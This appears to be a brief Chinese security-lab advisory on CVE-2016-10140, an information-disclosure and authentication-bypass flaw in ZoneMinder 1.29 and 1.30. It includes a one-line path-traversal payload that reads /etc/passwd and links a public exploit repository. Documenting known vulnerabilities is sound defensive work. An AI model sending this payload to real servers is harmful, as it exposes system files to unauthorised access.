CVE-2016-10140
CVE-2016-10140
漏洞描述:ZoneMinder v1.30和v1.29捆绑的Apache HTTP Server配置中存在信息泄露和认证绕过漏洞,允许远程未认证攻击者浏览web根目录下的所有目录。
POC:/?view=file&path=/../../../../../etc/passwd
EXP:https://github.com/asaotomo/CVE-2016-10140-Zoneminder-Poc
![图片[1]-【初级】Zoneminder 未授权访问-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/09/d2b5ca33bd100924-1024x169.png)
© 版权声明
部分文章采集于互联网,若侵权请联系删除!
THE END
请登录后查看评论内容